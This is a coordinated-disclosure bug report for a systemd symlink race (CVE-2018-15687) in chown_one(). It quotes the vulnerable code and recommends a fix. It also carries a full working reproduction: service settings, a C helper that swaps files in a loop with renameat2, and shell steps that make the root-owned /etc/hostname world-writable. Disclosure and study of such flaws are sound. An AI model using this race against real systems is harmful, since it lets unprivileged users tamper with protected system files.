systemd: chown_one() can dereference symlinks CVE-2018-15687 [I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at <a href="https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports" title="" class="" rel="nofollow">https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports</a> .] When chown_one() in the recursive chown logic decides that it has to change ownership of a directory entry, it first changes ownership as follows: if (name) r = fchownat(fd, name, uid, gid, AT_SYMLINK_NOFOLLOW); else r = fchown(fd, uid, gid); if (r < 0) return -errno; So far, this looks good. But then this happens: /* The linux kernel alters the mode in some cases of chown(). Let's undo this. */ if (name) { if (!S_ISLNK(st->st_mode)) r = fchmodat(fd, name, st->st_mode, 0); else /* There's currently no AT_SYMLINK_NOFOLLOW for fchmodat() */ r = 0; } else r = fchmod(fd, st->st_mode); This is dangerous, especially in the case where `name != NULL`. First off: I don't think that the overall objective of this code block makes sense. Yes, the kernel sometimes changes the mode when ownership is changed - but that's only for set-UID binaries and set-GID binaries (but not set-GID directories). I'm pretty sure that setuid/setgid binaries aren't supposed to appear in these directories anyway. The problem here is that, as the comment explains, `fchmodat(fd, name, st->st_mode, 0)` follows symlinks. The fchmodat() call is guarded by a `S_ISLNK(st->st_mode)` check, but that's obviously racy and therefore doesn't actually help. My recommended fix is to just remove the offending code block. If, for some crazy reason, you actually want to support changing the ownership of setuid/setgid binaries, an alternative might be to do something like this: int fd2 = openat(fd, name, O_PATH|O_NOFOLLOW|O_CLOEXEC); if (fd2 >= 0) { fchmod(fd2, st->st_mode); close(fd2); } To reproduce, as root, create a service with "Restart=always", "StartLimitIntervalSec=0", "StateDirectory=test_service" and "User=user" (where "user" is the name of an unprivileged account). Point "ExecStart" at a binary that immediately exits: ======== int main(void) { return 0; } ======== Then start the service. Next, as the user the service is running as, create some entries in /var/lib/test_service: ======== user@ubuntu-18-04-vm:~$ cd /var/lib/test_service/ user@ubuntu-18-04-vm:/var/lib/test_service$ touch foo user@ubuntu-18-04-vm:/var/lib/test_service$ chmod 0666 foo user@ubuntu-18-04-vm:/var/lib/test_service$ ln -s /etc/hostname foo2 user@ubuntu-18-04-vm:/var/lib/test_service$ ln foo foo_link user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la total 8 drwxr-xr-x 2 user user 4096 Okt 8 16:42 . drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link ======== Create and run a helper that continuously switches "foo" and "foo2" with each other: ======== user@ubuntu-18-04-vm:~$ cat exchange.c #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <err.h> #include <sys/syscall.h> int main(int argc, char **argv) { char *base = argv[1], *p1 = argv[2], *p2 = argv[3]; if (chdir(base)) err(1, "chdir"); while (1) { if (syscall(__NR_renameat2, AT_FDCWD, p1, AT_FDCWD, p2, 2)) perror("renameat"); } } user@ubuntu-18-04-vm:~$ gcc -o exchange exchange.c -O2 user@ubuntu-18-04-vm:~$ ./exchange /var/lib/test_service foo foo2 ======== Change ownership of "foo_link" and the test_service directory to trigger the permission fixup logic when the service restarts the next time: ======== user@ubuntu-18-04-vm:/var/lib/test_service$ chown user:cdrom foo_link . ======== Check whether it worked: ======== user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname . -rw-r--r-- 1 root root 16 Jul 3 19:20 /etc/hostname .: total 8 drwxr-xr-x 2 user user 4096 Okt 8 16:45 . drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo -> /etc/hostname -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo2 -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link ======== If it didn't work (as in this example), retry the chown a few times. After a few times, you should see this: ======== user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname . -rw-rw-rw- 1 root root 16 Jul 3 19:20 /etc/hostname .: total 8 drwxr-xr-x 2 user user 4096 Okt 8 16:46 . drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname -rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link ======== Another thing that might also go wrong, but that I haven't tested, is the interaction with the mount.ecryptfs_private helper that comes with ecryptfs. As far as I can tell, an attacker would be able to use mount.ecryptfs_private to mount an ecryptfs inside the StateDirectory. This ecryptfs instance could then function similar to a bind mount, causing systemd to change the ownership of files that are e.g. in /etc. You might want to ensure that no files or directories you access are located on an ecryptfs filesystem. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh